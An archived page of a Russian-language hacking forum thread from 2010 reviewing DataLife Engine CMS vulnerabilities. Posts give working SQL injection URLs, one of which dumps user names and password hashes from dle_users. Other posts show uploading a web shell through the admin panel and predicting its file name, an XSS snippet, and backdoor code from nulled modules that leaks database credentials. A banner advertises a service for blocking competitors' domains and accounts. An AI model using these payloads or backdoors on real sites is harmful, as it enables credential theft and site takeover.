УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
[ Обзор уязвимостей DataLife Engine ]

Страница 19 из 39

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#181

18.06.2010, 14:02

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

2 RulleR:

ну запусти проверочный код, поймешь

#182

18.06.2010, 14:04

Jokester

Познавший АНТИЧАТ

Регистрация: 18.02.2008

Сообщений: 1,136

Провел на форуме:
17621293

Репутация: 4915

Цитата:

Сообщение от RulleR

RulleR said:
думаю видно, что переменная
$tid
в любом случае проходит через
intval()

Создай на локалке такой код

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tid[/COLOR][COLOR="#007700"])){    echo[/COLOR][COLOR="#DD0000"]"прошли"[/COLOR][COLOR="#007700"];}[/COLOR][/COLOR]

И передай

file.php?tid=1+lololo+trololo

Пашкелла-же написал об этом

=====================

// Ctacok не три посты с обсуждением

// Ок, да они вроде разобрались уже. Ctacok

#183

18.06.2010, 14:50

Strilo4ka

Reservists Of Antichat - Level 6

Регистрация: 05.04.2009

Сообщений: 231

Провел на форуме:
3363660

Репутация: 1148

DLE forum 2.5 - скачать отсюдо

Я посмотрел. Там только одна зависимость rg=on так как плагин древний.

Код:

Code:
http://localhost/DLE8.3/?do=forum&act=topic&tid=1+and+1=%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29

Цитата:

Сообщение от None

MySQL Error!
------------------------
The Error returned was:
Duplicate entry '5.0.45-community-nt1' for key 1
Error Number:
1062

Можно крутить как быстрый блинд, есть вывод ошибки.

Вывода нормального у мну небыло:

http://localhost/DLE8.3/?do=forum&act=topic&tid=1+order+by+1--+

MySQL Error!

------------------------

The Error returned was:

Unknown column '1' in 'order clause'

Error Number:

1054

ага и так:

http://localhost/DLE8.3/?do=forum&act=topic&tid=-1+union+select+1,2,version%28%29,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24

вывод в - 3 поле.

#184

18.06.2010, 15:21

RulleR

Reservists Of Antichat - Level 6

Регистрация: 12.06.2008

Сообщений: 157

Провел на форуме:
3217552

Репутация: 1668

Отправить сообщение для RulleR с помощью ICQ

Отправить сообщение для RulleR с помощью Yahoo

C интвалом разобрался, спасибо. Потестил узвимость на локалхосте, срабатывает только при register_globals = On

Код:

Code:
http://[host]/[path]/index.php?do=forum&act=topic&tid=1+and+1=2+union+select+1,2,concat_ws(0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+dle_users+where+user_id=1

__________________
Avant que l'ombre...

#185

18.06.2010, 15:27

wildshaman

Постоянный

Регистрация: 16.04.2008

Сообщений: 889

Провел на форуме:
12942062

Репутация: 1550

Отправить сообщение для wildshaman с помощью ICQ

Упс, большое спасибо, у меня на денвере rg=on стояло для тестов, а я забыл про это (

Думал, там $tid передается при инклуде, просмотрел, спасибо.

Дописал в пост.

#186

22.06.2010, 08:35

RAISh

Новичок

Регистрация: 30.04.2010

Сообщений: 8

Провел на форуме:
110375

Репутация: 0

В админке разрешаешь заливку php файлов, добавляешь новость и прикрепляешь файл к ней, т.е. сам шелл и всё. После смотришь имя, которое ему присвоилось таким способом:

Описание: Получение названия загруженного файла (шелла, к примеру) через форму заливки

Зависимость: Права админа или журналиста с разрешением заливать файлы через админку

Файл: /admin.php?mod=files

Кусок кода:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]100[/COLOR][COLOR="#007700"]); 

[/COLOR][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"]; 

@[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$imageurl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/uploads/files/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$file_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$image_name[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]

Ага, пишется: unixtime+{случайное число от 1 до 100}_название_файла_что_мы_вы� �рузили

Отсылаем файл, снифаем, что вернул сервер:

Date: Mon, 14 Jun 2010 07:35:04 GMT

делаем себе

[PHP]
PHP:
[COLOR="#000000"]for($i=0;$i[COLOR="#007700"]

#187

26.06.2010, 17:37

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

xss

xss, проверял на 8.5 и 8.2

file /engine/modules/imagepreview.php

[PHP]
PHP:
[COLOR="#000000"]
$_GET['image'] = @htmlspecialchars($_GET['image'],ENT_QUOTES);

if(preg_match([COLOR="#DD0000"]"/[?&;%

#188

21.07.2010, 12:07

Alex$09

Новичок

Регистрация: 01.10.2009

Сообщений: 27

Провел на форуме:
52963

Репутация: -2

Дядя ZloY как всегда постарался(как понел это типо бекдоры в нуллах и модулях от злово и его "мега команды")...

1)

require_once ENGINE_DIR.'/data/dbconfig.php';

echo "dbconfig.php : Host = ".DBHOST." DBName = ".DBNAME." DBUser = ".DBUSER." DBPassword: ".DBPASS."

";

2)

require_once ENGINE_DIR.'/api/api.class.php';

$user = md5(rand(0,10000));

$password = md5(rand(0,1000));

$res = $dle_api->external_register($user,$password,md5(rand(0,1000 00))."@mail

.ru",1);

echo $res;

echo $user;

echo "
";

echo $password;

З.Ы. Кто знает как юзать плиз в личку кинь... Ах да, было найдено http://getdle.com/extras/referer/xss/1.txt и http://getdle.com/extras/referer/xss/2.txt

#189

21.07.2010, 13:21

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

А чо там юзать - просто при заходе на ./engine/data/dbconfig.php выводится логин, пасс и хост базы данных.

А второе регистрирует нового юзверя и выводит пароль и логин.

#190

15.09.2010, 15:11

FlooP1k

Guest

Сообщений: n/a

Провел на форуме:
30137

Репутация: 48

Что то давно о ДЛЕ не чего не слышно уже как бы и 9.0 вышло ...

И офф. сайт чето мудрит http://dle-news.ru/bags/v90/1127-nedostatochnaya-filtraciya-vhodyaschih-dannyh.html

Страница 19 из 39

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор уязвимостей WordPress ]	ettee	Веб-уязвимости	383	23.11.2019 05:00
Обзор уязвимостей в платных CMS	ZAMUT	Веб-уязвимости	90	03.12.2017 01:35
DataLife Engine v.6.5. Null	Student :)	ПО для Web разработчика	31	23.02.2008 15:36
[ Обзор уязвимостей miniBB ]	-=lebed=-	Уязвимости CMS / форумов	3	12.01.2008 20:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход